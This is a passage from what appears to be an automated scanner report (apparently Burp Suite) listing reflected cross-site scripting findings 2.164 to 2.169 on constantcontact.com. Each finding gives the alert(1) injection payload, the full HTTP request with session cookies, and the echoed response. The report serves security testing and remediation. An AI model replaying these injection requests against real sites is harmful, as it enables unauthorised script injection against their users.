Set-Cookie: cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_04_ts=21510991|prt_04=partner.name::ROVING|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:31:00 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:31:00 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 20964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/analytics/c69ee';alert(1)//d212da10a1c/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1';
s.ca
...[SNIP]...

2.164. http://www.constantcontact.com/community [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /community

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9855a'%3balert(1)//c59f81f41b4 was submitted in the REST URL parameter 1. This input was echoed as 9855a';alert(1)//c59f81f41b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community9855a'%3balert(1)//c59f81f41b4 HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:38 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=13967BD960F323063D8F10EA7D9DA648.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:38 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:38 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:38 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:38 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/community9855a';alert(1)//c59f81f41b4/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.165. http://www.constantcontact.com/default/javascript.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /default/javascript.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da525'%3balert(1)//0fa8b10d2b5 was submitted in the REST URL parameter 1. This input was echoed as da525';alert(1)//0fa8b10d2b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /defaultda525'%3balert(1)//0fa8b10d2b5/javascript.js HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/5a6af%3balert(1)//643b2b45b88|partner.name=ROVING|"; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; offer_temp=""; ctctblog=1%3A%3A21510934

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:29:57 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=1610E6A995E836C0932E6C6D7B8282AB.worker_landingPages; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:57 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:57 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510989|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:57 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:57 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: public, max-age=29030400
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerProdLP=2202407946.20480.0000; path=/
Content-Length: 20967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/defaultda525';alert(1)//0fa8b10d2b5/javascript.js';
s.server='531';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1';

...[SNIP]...

2.166. http://www.constantcontact.com/default/javascript.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /default/javascript.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 862ba'%3balert(1)//f608c9d0454 was submitted in the REST URL parameter 2. This input was echoed as 862ba';alert(1)//f608c9d0454 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default/862ba'%3balert(1)//f608c9d0454 HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/5a6af%3balert(1)//643b2b45b88|partner.name=ROVING|"; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; offer_temp=""; ctctblog=1%3A%3A21510934

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:30:03 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=5146025AF1C6A058EC2A3E1B597A1918.worker_landingPages; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:03 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:03 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510990|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:03 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:03 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerProdLP=2269516810.20480.0000; path=/
Content-Length: 20958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/default/862ba';alert(1)//f608c9d0454/index.jsp';
s.server='535';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1';
s.ca
...[SNIP]...

2.167. http://www.constantcontact.com/email-marketing/index.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /email-marketing/index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1959'%3balert(1)//23cdf1ecd1d was submitted in the REST URL parameter 1. This input was echoed as a1959';alert(1)//23cdf1ecd1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /email-marketinga1959'%3balert(1)//23cdf1ecd1d/index.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:41 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=CEDF0941A1EBEAB6393402715D6DF639.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:41 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:41 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:41 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:41 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/email-marketinga1959';alert(1)//23cdf1ecd1d/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.168. http://www.constantcontact.com/email-marketing/index.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /email-marketing/index.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daeca'%3balert(1)//fb24bf73e27 was submitted in the REST URL parameter 2. This input was echoed as daeca';alert(1)//fb24bf73e27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /email-marketing/daeca'%3balert(1)//fb24bf73e27 HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:58 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=346B53E8E206B45025F07B672B00C43F.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:58 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:58 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:58 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:58 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/email-marketing/daeca';alert(1)//fb24bf73e27/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.169. http://www.constantcontact.com/event-marketing/index.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /event-marketing/index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d0c6'%3balert(1)//06b6ed919e7 was submitted in the REST URL parameter 1. This input was echoed as 9d0c6';alert(1)//06b6ed919e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /event-marketing9d0c6'%3balert(1)//06b6ed919e7/index.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:40 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=B759A345FB35D4936D6F3EE742C6E59D.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:40 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:40 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:40 GMT; Path=/
